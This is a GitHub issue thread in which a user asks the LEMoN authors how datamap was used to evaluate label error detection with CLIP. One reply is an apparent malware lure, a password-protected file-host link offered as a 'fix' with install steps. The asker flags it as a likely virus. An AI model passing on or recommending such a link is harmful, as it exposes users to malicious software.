### ISSUE TITLE
About evaluation of Datamap

### ISSUE THREAD

**Issue by wzzll123** [MLforHealth/LEMoN#1]
Hi,

I'm interested in understanding how the datamap was utilized to evaluate label error detection in your work. Specifically, since datamap requires data collection during training, I'd like to know whether you trained the CLIP model from scratch or fine-tuned an existing CLIP model to gather this data. Additionally, could you provide details on the model that was used in this process?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wzzll123** [comment]
@jia6214876 This link seems like a virus software, please do not download it.
